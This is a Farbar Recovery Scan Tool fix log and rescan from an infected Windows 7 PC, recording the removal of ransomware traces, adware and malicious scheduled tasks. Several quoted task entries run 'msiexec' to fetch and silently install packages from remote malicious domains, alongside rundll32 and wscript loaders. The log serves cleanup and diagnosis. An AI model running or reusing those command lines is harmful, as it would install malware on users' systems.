Fix result of Farbar Recovery Scan Tool (x86) Version: 01-01-2019
Ran by ВЕС (04-01-2019 18:18:30) Run:2
Running from C:\Users\ВЕС\Downloads
Loaded Profiles: ВЕС (Available Profiles: ВЕС)
Boot Mode: Safe Mode (with Networking)

==============================================

fixlist content:
*****************
start
CreateRestorePoint:
EmptyTemp:
CloseProcesses:

CMD: sc stop "qamplvkj"
CMD: sc delete "qamplvkj"

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3512987231-521144983-709920193-1000\...\Run: [DHY0GM3ATCSFE7M] => "C:\Program Files\x0h1djdcnoe\3OQCH.exe"
HKU\S-1-5-21-3512987231-521144983-709920193-1000\...\Run: [Web Companion] => C:\Program Files\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize
HKU\S-1-5-21-3512987231-521144983-709920193-1000\...\MountPoints2: {41be252d-0f82-11e9-a624-002713343a56} - F:\Lenovo_Suite.exe
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
SearchScopes: HKU\S-1-5-21-3512987231-521144983-709920193-1000 -> {BDF61FAE-9D19-40F0-8F34-688DEB334CA9} URL = hxxp://securedsearch.lavasoft.com/results.php?pr=vmn&id=webcompa&ent=ch_WCYID10477_754_190103&q={searchTerms}
BHO: YoutubeAdBlock -> {984AFA40-4BEC-457F-AEDE-FE3404A646FA} -> C:\Program Files\VKkhWVSisIE\kwTiXoR.dll => No File 
S2 qamplvkj; C:\Windows\system32\qamplvkj\dfaricjc.exe [0 ] () <==== ATTENTION (zero byte File/Folder)
2019-01-03 19:10 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\teiqv2gvtfm
2019-01-03 19:10 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\imgn0qmwmwh
2019-01-03 19:10 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\acysy1vaoki
2019-01-03 19:08 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\3zxuksmazmq
2019-01-03 19:04 - 2019-01-03 19:04 - 000000000 ____D C:\Windows\system32\qamplvkj
2019-01-03 19:02 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\vi5lm2mflim
2019-01-03 19:02 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\sq0zlve2tqj
2019-01-03 19:02 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\qc1oa2vrskn
2019-01-03 19:02 - 2019-01-03 19:02 - 000000000 ____D C:\Users\ВЕС\AppData\LocalLow\yHNPHHIzKpsCK
2019-01-03 19:01 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\423viiu5lfu
2019-01-03 18:57 - 2019-01-03 18:57 - 000008906 _____ C:\Users\NYBMYXMIG-DECRYPT.txt
2019-01-03 18:57 - 2019-01-03 18:57 - 000008906 _____ C:\NYBMYXMIG-DECRYPT.txt
2019-01-03 18:57 - 2019-01-03 18:57 - 000000000 ____H C:\d85105b2d85102533b.lock
2019-01-03 18:56 - 2019-01-03 18:56 - 000000000 ____D C:\ProgramData\HCRGWPOIZH4OHCKX91M2
C:\Windows\system32\qamplvkj\dfaricjc.exe
Task: {28388CE9-2CA7-49CC-9564-0F424E14BEED} - System32\Tasks\DvwLFWwXutwLxJgmB2 => rundll32 "C:\Program Files\ooxzIAzTqruiVIszQdR\yydPZjO.dll",#1
Task: {56D6A7AF-393C-40E2-9FC4-2A3636BD7188} - System32\Tasks\{EF961BFA-57B7-56F3-7C41-CBDA384B27B1} => "msiexec" -package hxxps://refreshnerer711.info/wVM4raQAo.n1e /q
Task: {7AF01070-CEDB-4440-A34C-665C65F672C1} - System32\Tasks\iYMvCriySoqaGgPjbmR2 => rundll32 "C:\Program Files\qUgzYKxVLnesC\lnFhOtc.dll",#1
Task: {8E82EE52-6E07-47A4-94E6-6615304E8C41} - System32\Tasks\{9691CC12-2E74-1BC2-86C6-CA40BD9675B3} => "msiexec" /q /i hxxps://refreshnerer711rb.info/F01BsF0RBXQ.CrC
Task: {97F429C1-49D9-4EE5-82B4-4FC29549D18B} - System32\Tasks\UXshqEpiPQcXH2 => C:\Windows\system32\wscript.exe "C:\ProgramData\BuHcEEPgNwocAWVB\QkkdFBc.wsf"
Task: {DB69F2CB-FE06-4A26-872B-C008C9CFD1BC} - System32\Tasks\mMzvDpxKxjJVUr => rundll32 "C:\Program Files\hUmbquBpttZU2\mNvKUiXnBbMki.dll",#1
AlternateDataStreams: C:\Windows\system32\config\systemprofile:.repos [6509722]
IE trusted site: HKU\S-1-5-21-3512987231-521144983-709920193-1000\...\webcompanion.com -> hxxp://webcompanion.com
reboot:
end

*****************

Error: Restore point can only be created in normal mode.
Processes closed successfully.

========= sc stop "qamplvkj" =========

[SC] ControlService FAILED 1062:

The service has not been started.


========= End of CMD: =========


========= sc delete "qamplvkj" =========

[SC] DeleteService SUCCESS

========= End of CMD: =========

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => not found
"HKU\S-1-5-21-3512987231-521144983-709920193-1000\Software\Microsoft\Windows\CurrentVersion\Run\\DHY0GM3ATCSFE7M" => not found
"HKU\S-1-5-21-3512987231-521144983-709920193-1000\Software\Microsoft\Windows\CurrentVersion\Run\\Web Companion" => not found
HKU\S-1-5-21-3512987231-521144983-709920193-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{41be252d-0f82-11e9-a624-002713343a56} => not found
HKLM\Software\Classes\CLSID\{41be252d-0f82-11e9-a624-002713343a56} => not found
HKLM\SOFTWARE\Policies\Google => not found
HKU\S-1-5-21-3512987231-521144983-709920193-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BDF61FAE-9D19-40F0-8F34-688DEB334CA9} => not found
HKLM\Software\Classes\CLSID\{BDF61FAE-9D19-40F0-8F34-688DEB334CA9} => not found
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{984AFA40-4BEC-457F-AEDE-FE3404A646FA} => not found
HKLM\Software\Classes\CLSID\{984AFA40-4BEC-457F-AEDE-FE3404A646FA} => not found
qamplvkj => service not found.
C:\Users\ВЕС\AppData\Roaming\teiqv2gvtfm => moved successfully
C:\Users\ВЕС\AppData\Roaming\imgn0qmwmwh => moved successfully
C:\Users\ВЕС\AppData\Roaming\acysy1vaoki => moved successfully
C:\Users\ВЕС\AppData\Roaming\3zxuksmazmq => moved successfully
C:\Windows\system32\qamplvkj => moved successfully
C:\Users\ВЕС\AppData\Roaming\vi5lm2mflim => moved successfully
C:\Users\ВЕС\AppData\Roaming\sq0zlve2tqj => moved successfully
C:\Users\ВЕС\AppData\Roaming\qc1oa2vrskn => moved successfully
"C:\Users\ВЕС\AppData\LocalLow\yHNPHHIzKpsCK" => not found
C:\Users\ВЕС\AppData\Roaming\423viiu5lfu => moved successfully
"C:\Users\NYBMYXMIG-DECRYPT.txt" => not found
C:\NYBMYXMIG-DECRYPT.txt => moved successfully
C:\d85105b2d85102533b.lock => moved successfully
C:\ProgramData\HCRGWPOIZH4OHCKX91M2 => moved successfully
"C:\Windows\system32\qamplvkj\dfaricjc.exe" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{28388CE9-2CA7-49CC-9564-0F424E14BEED}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{28388CE9-2CA7-49CC-9564-0F424E14BEED}" => removed successfully.
C:\Windows\System32\Tasks\DvwLFWwXutwLxJgmB2 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DvwLFWwXutwLxJgmB2" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{56D6A7AF-393C-40E2-9FC4-2A3636BD7188}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{56D6A7AF-393C-40E2-9FC4-2A3636BD7188}" => removed successfully.
C:\Windows\System32\Tasks\{EF961BFA-57B7-56F3-7C41-CBDA384B27B1} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{EF961BFA-57B7-56F3-7C41-CBDA384B27B1}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7AF01070-CEDB-4440-A34C-665C65F672C1}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7AF01070-CEDB-4440-A34C-665C65F672C1}" => removed successfully.
C:\Windows\System32\Tasks\iYMvCriySoqaGgPjbmR2 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\iYMvCriySoqaGgPjbmR2" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{8E82EE52-6E07-47A4-94E6-6615304E8C41}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8E82EE52-6E07-47A4-94E6-6615304E8C41}" => removed successfully.
C:\Windows\System32\Tasks\{9691CC12-2E74-1BC2-86C6-CA40BD9675B3} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{9691CC12-2E74-1BC2-86C6-CA40BD9675B3}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{97F429C1-49D9-4EE5-82B4-4FC29549D18B}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{97F429C1-49D9-4EE5-82B4-4FC29549D18B}" => removed successfully.
C:\Windows\System32\Tasks\UXshqEpiPQcXH2 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\UXshqEpiPQcXH2" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DB69F2CB-FE06-4A26-872B-C008C9CFD1BC}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DB69F2CB-FE06-4A26-872B-C008C9CFD1BC}" => removed successfully.
C:\Windows\System32\Tasks\mMzvDpxKxjJVUr => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\mMzvDpxKxjJVUr" => removed successfully.
C:\Windows\system32\config\systemprofile => ":.repos" ADS removed successfully.
HKU\S-1-5-21-3512987231-521144983-709920193-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com => removed successfully.

=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 12395873 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 5029417 B
Edge => 0 B
Chrome => 218449083 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 66228 B
LocalService => 66228 B
NetworkService => 66228 B
ВЕС => 71105094 B

RecycleBin => 923852 B
EmptyTemp: => 293.8 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 18:18:47 ====

In normal mode

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 01-01-2019
Ran by ВЕС (administrator) on WIN-SKFJ6HLGST2 (04-01-2019 18:26:43)
Running from C:\Users\ВЕС\Downloads
Loaded Profiles: ВЕС (Available Profiles: ВЕС)
Platform: Microsoft Windows 7 Ultimate  Service Pack 1 (X86) Language: English (United States)
Internet Explorer Version 8 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMWsc.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKLM\...\Drivers32: [MSVideo8] => C:\Windows\system32\VfWWDM32.dll [56832 2010-11-20] (Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [>{60B49E34-C7CC-11D0-8953-00A0C90347FF}] -> C:\Windows\System32\iedkcs32.dll [2010-11-20] (Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\71.0.3578.98\Installer\chrmstp.exe [2019-01-03] (Google Inc.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{840DEA2A-8553-4D25-A5FB-7DB86C5BFBE5}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{EE11610E-0BCC-42A7-A0AC-89B4A3B92BF1}: [DhcpNameServer] 192.168.0.1

Internet Explorer:
==================
HKU\S-1-5-21-3512987231-521144983-709920193-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/en-xl/?ocid=iehp

FireFox:
========
FF ProfilePath: C:\Users\ВЕС\AppData\Roaming\K-Meleon\oytl87x0.default [2019-01-03]
FF user.js: detected! => C:\Users\ВЕС\AppData\Roaming\K-Meleon\oytl87x0.default\user.js [2006-04-06]
FF Extension: (NewsFox) - C:\Users\ВЕС\Downloads\k-meleon\browser\extensions\{899DF1F8-2F43-4394-8315-37F6744E6319}.xpi [2016-01-04] [Legacy] [not signed]
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.33.23\npGoogleUpdate3.dll [No File]
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.33.23\npGoogleUpdate3.dll [No File]

Chrome: 
=======
CHR HomePage: Default -> hxxp://google.bg/
CHR Profile: C:\Users\ВЕС\AppData\Local\Google\Chrome\User Data\Default [2019-01-04]
CHR Extension: (Lightshot (скрииншот инструмент)) - C:\Users\ВЕС\AppData\Local\Google\Chrome\User Data\Default\Extensions\mbniclmhobmnbdlbpiphghaielnnpgdp [2019-01-03]
CHR Extension: (Плащания в уеб магазина на Chrome) - C:\Users\ВЕС\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-01-03]
CHR Extension: (Chrome Media Router) - C:\Users\ВЕС\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-01-03]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 GoogleChromeElevationService; C:\Program Files\Google\Chrome\Application\71.0.3578.98\elevation_service.exe [375776 2018-12-12] (Google Inc.)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [5073376 2018-09-19] (Malwarebytes)
S2 gupdate; "C:\Program Files\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files\Google\Update\GoogleUpdate.exe" /medsvc [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae.sys [129248 2018-12-04] (Malwarebytes)
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [172280 2019-01-04] (Malwarebytes)
R3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [106144 2019-01-04] (Malwarebytes)
R3 MBAMProtection; C:\Windows\System32\DRIVERS\mbam.sys [63760 2019-01-04] (Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [230120 2019-01-04] (Malwarebytes)
R3 MBAMWebProtection; C:\Windows\System32\DRIVERS\mwac.sys [83648 2019-01-04] (Malwarebytes)
U3 TrueSight; \??\C:\Windows\System32\drivers\truesight.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-01-04 18:20 - 2019-01-04 18:23 - 000083648 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2019-01-04 18:20 - 2019-01-04 18:20 - 000230120 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2019-01-04 18:20 - 2019-01-04 18:20 - 000106144 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2019-01-04 18:20 - 2019-01-04 18:20 - 000063760 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2019-01-04 18:18 - 2019-01-04 18:18 - 000010173 _____ C:\Users\ВЕС\Downloads\Fixlog.txt
2019-01-04 16:30 - 2019-01-04 16:30 - 000005319 _____ C:\Users\ВЕС\Documents\Fixlog.txt
2019-01-04 16:30 - 2019-01-04 16:30 - 000003620 _____ C:\Users\ВЕС\Documents\fixlist.txt
2019-01-04 03:15 - 2019-01-04 03:15 - 000001345 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Media Center.lnk
2019-01-04 03:15 - 2019-01-04 03:15 - 000001326 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows DVD Maker.lnk
2019-01-04 03:14 - 2019-01-04 03:14 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdFs_01_09_00.Wdf
2019-01-04 03:10 - 2019-01-03 18:31 - 000000000 ____D C:\Windows\Panther
2019-01-04 03:03 - 2019-01-04 03:03 - 000000000 ____D C:\Windows.old
2019-01-03 20:44 - 2019-01-03 20:44 - 000017953 _____ C:\Users\ВЕС\Downloads\Addition.txt
2019-01-03 20:43 - 2019-01-04 18:27 - 000005358 _____ C:\Users\ВЕС\Downloads\FRST.txt
2019-01-03 20:43 - 2019-01-04 18:26 - 000000000 ____D C:\FRST
2019-01-03 20:43 - 2019-01-03 20:43 - 001783808 _____ (Farbar) C:\Users\ВЕС\Downloads\FRST.exe
2019-01-03 20:03 - 2019-01-03 20:03 - 000000000 ____D C:\Users\ВЕС\AppData\Local\mbam
2019-01-03 20:02 - 2019-01-04 16:29 - 000172280 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys
2019-01-03 20:02 - 2019-01-03 20:02 - 000002020 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2019-01-03 20:02 - 2019-01-03 20:02 - 000000000 ____D C:\Users\ВЕС\AppData\Local\mbamtray
2019-01-03 20:02 - 2019-01-03 20:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2019-01-03 20:02 - 2019-01-03 20:02 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-01-03 20:02 - 2019-01-03 20:02 - 000000000 ____D C:\Program Files\Malwarebytes
2019-01-03 20:02 - 2018-12-04 08:09 - 000129248 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae.sys
2019-01-03 20:00 - 2019-01-03 20:01 - 081227760 _____ (Malwarebytes ) C:\Users\ВЕС\Downloads\mb3-setup-consumer-3.6.1.2711-1.0.508-1.0.8211.exe
2019-01-03 19:40 - 2019-01-03 20:03 - 000000000 ____D C:\ProgramData\RogueKiller
2019-01-03 19:40 - 2019-01-03 19:40 - 029162424 _____ (Adlice Software ) C:\Users\ВЕС\Downloads\RogueKiller_setup.exe
2019-01-03 19:40 - 2019-01-03 19:40 - 000001001 _____ C:\Users\Public\Desktop\RogueKiller.lnk
2019-01-03 19:40 - 2019-01-03 19:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
2019-01-03 19:40 - 2019-01-03 19:40 - 000000000 ____D C:\Program Files\RogueKiller
2019-01-03 19:34 - 2019-01-04 16:29 - 000383916 _____ C:\Windows\ntbtlog.txt
2019-01-03 19:30 - 2019-01-03 19:30 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_09_00.Wdf
2019-01-03 19:10 - 2019-01-03 19:10 - 006161408 _____ C:\Users\ВЕС\AppData\Local\dump007.dat
2019-01-03 19:09 - 2019-01-03 19:09 - 000000009 _____ C:\Users\ВЕС\rstr1.ini
2019-01-03 19:07 - 2019-01-03 19:07 - 000000258 __RSH C:\Users\ВЕС\ntuser.pol
2019-01-03 19:02 - 2019-01-03 19:02 - 000000000 ____D C:\Users\ВЕС\AppData\LocalLow\yHNPHHIzKpsCK
2019-01-03 19:01 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Michael
2019-01-03 19:01 - 2019-01-03 19:19 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\ShopMore
2019-01-03 19:01 - 2019-01-03 19:07 - 000002964 __RSH C:\ProgramData\ntuser.pol
2019-01-03 19:01 - 2019-01-03 19:01 - 000493800 _____ (VideoDriver) C:\Windows\D04DE5140B2D.sys
2019-01-03 19:01 - 2019-01-03 19:01 - 000140800 _____ C:\Users\ВЕС\AppData\Local\installer.dat
2019-01-03 19:01 - 2019-01-03 19:01 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\Python
2019-01-03 19:00 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\ezc3lfxnx4j
2019-01-03 19:00 - 2019-01-03 19:00 - 000000003 _____ C:\Users\ВЕС\AppData\Local\wbem.ini
2019-01-03 19:00 - 2019-01-03 19:00 - 000000000 ____D C:\ProgramData\{AC10FE2E-1A46-0496-3E07-15883EE04CD9}
2019-01-03 19:00 - 2019-01-03 19:00 - 000000000 ____D C:\ProgramData\{59403C6F-D807-F1C6-7FC5-457D7F221C2C}
2019-01-03 18:57 - 2019-01-03 18:57 - 000008906 _____ C:\Users\NYBMYXMIG-DECRYPT.txt
2019-01-03 18:56 - 2015-08-03 08:53 - 000384000 _____ (SafeIP) C:\Windows\system32\SafeIPs.dll
2019-01-03 18:55 - 2019-01-03 20:05 - 000000000 ____D C:\Program Files\KMSPico 10.2.1 Final
2019-01-03 18:53 - 2018-12-10 23:04 - 000499424 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2019-01-03 18:48 - 2019-01-03 18:48 - 001259736 _____ (Plarium) C:\Users\ВЕС\Downloads\PlariumPlaySetup (1).exe
2019-01-03 18:46 - 2019-01-03 18:46 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Package Cache
2019-01-03 18:45 - 2019-01-03 19:03 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\Mozilla
2019-01-03 18:45 - 2019-01-03 18:45 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\K-Meleon
2019-01-03 18:45 - 2019-01-03 18:45 - 000000000 ____D C:\Users\ВЕС\AppData\Local\K-Meleon
2019-01-03 18:44 - 2019-01-03 18:44 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Plarium
2019-01-03 18:44 - 2019-01-03 18:44 - 000000000 ____D C:\Users\ВЕС\AppData\Local\CEF
2019-01-03 18:39 - 2019-01-03 18:39 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\Google
2019-01-03 18:38 - 2019-01-03 19:53 - 000002202 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-01-03 18:38 - 2019-01-03 19:53 - 000002161 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2019-01-03 18:37 - 2019-01-03 19:02 - 000000000 ____D C:\Program Files\Google
2019-01-03 18:37 - 2019-01-03 19:00 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Google
2019-01-03 18:37 - 2019-01-03 18:37 - 000057560 _____ C:\Users\ВЕС\AppData\Local\GDIPFONTCACHEV1.DAT
2019-01-03 18:37 - 2019-01-03 18:37 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Deployment
2019-01-03 18:37 - 2019-01-03 18:37 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Apps\2.0
2019-01-03 18:36 - 2014-05-14 17:23 - 001973728 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2019-01-03 18:36 - 2014-05-14 17:23 - 000054240 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2019-01-03 18:36 - 2014-05-14 17:23 - 000045536 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2019-01-03 18:36 - 2014-05-14 17:17 - 002425856 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2019-01-03 18:36 - 2014-05-14 09:23 - 000179656 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2019-01-03 18:36 - 2014-05-14 09:17 - 000033792 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2019-01-03 18:33 - 2019-01-03 19:53 - 000001335 _____ C:\Users\ВЕС\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2019-01-03 18:33 - 2019-01-03 19:09 - 000000000 ____D C:\Users\ВЕС
2019-01-03 18:33 - 2019-01-03 18:33 - 000000020 ___SH C:\Users\ВЕС\ntuser.ini
2019-01-03 18:33 - 2019-01-03 18:33 - 000000000 ____D C:\Users\ВЕС\AppData\Local\VirtualStore
2019-01-03 18:33 - 2010-11-21 01:46 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\Media Center Programs
2019-01-03 16:27 - 2019-01-03 16:27 - 000000000 ____D C:\My Drivers
2018-12-30 08:50 - 2018-12-30 08:50 - 005183296 _____ (Marcin Szeniak ) C:\Users\ВЕС\Downloads\BCUninstaller_4.12.1_setup.exe
2018-12-29 13:35 - 2018-12-29 13:35 - 000000000 ____D C:\SWSetup

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-01-04 18:24 - 2010-11-20 22:01 - 000713888 _____ C:\Windows\system32\PerfStringBackup.INI
2019-01-04 18:24 - 2009-07-14 03:37 - 000000000 ____D C:\Windows\inf
2019-01-04 18:19 - 2009-07-14 05:53 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-01-04 16:25 - 2009-07-14 05:34 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2019-01-04 16:25 - 2009-07-14 05:34 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2019-01-04 03:15 - 2009-07-14 05:52 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2019-01-04 03:15 - 2009-07-14 03:37 - 000000000 ____D C:\Windows\system32\sysprep
2019-01-04 03:12 - 2010-11-21 01:46 - 000000000 ____D C:\Windows\CSC
2019-01-04 03:10 - 2009-07-14 05:52 - 000028672 _____ C:\Windows\system32\config\BCD-Template
2019-01-03 19:01 - 2009-07-14 03:37 - 000000000 ____D C:\Windows\system32\GroupPolicy
2019-01-03 18:57 - 2018-08-11 19:54 - 000000000 ____D C:\Intel
2019-01-03 18:57 - 2017-10-21 13:53 - 000000000 ____D C:\LFS
2019-01-03 18:57 - 2017-09-25 20:50 - 000000000 ___RD C:\BECKO-PC
2019-01-03 18:57 - 2017-04-14 15:10 - 000036892 ____H C:\iCS Source.suo.nybmyxmig
2019-01-03 18:33 - 2009-07-14 05:33 - 000266808 _____ C:\Windows\system32\FNTCACHE.DAT
2019-01-03 18:31 - 2009-07-14 03:37 - 000000000 __RHD C:\Users\Public\Libraries
2019-01-03 17:30 - 2009-07-14 03:37 - 000000000 ____D C:\Windows\rescache
2019-01-03 15:34 - 2018-08-11 14:17 - 000000000 ____D C:\Users\ВЕС\Downloads\k-meleon
2019-01-01 13:09 - 2018-09-02 13:32 - 000000000 ____D C:\Users\ВЕС\Documents\TalkHelper

==================== Files in the root of some directories =======

1601-01-03 21:26 - 1601-01-03 21:26 - 000186368 ____N (Microsoft Corporation) C:\Users\ВЕС\AppData\Local\aIQEonJ.exe
2019-01-03 19:10 - 2019-01-03 19:10 - 006161408 _____ () C:\Users\ВЕС\AppData\Local\dump007.dat
2019-01-03 19:01 - 2019-01-03 19:01 - 000140800 _____ () C:\Users\ВЕС\AppData\Local\installer.dat
2019-01-03 19:00 - 2019-01-03 19:00 - 000000003 _____ () C:\Users\ВЕС\AppData\Local\wbem.ini

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
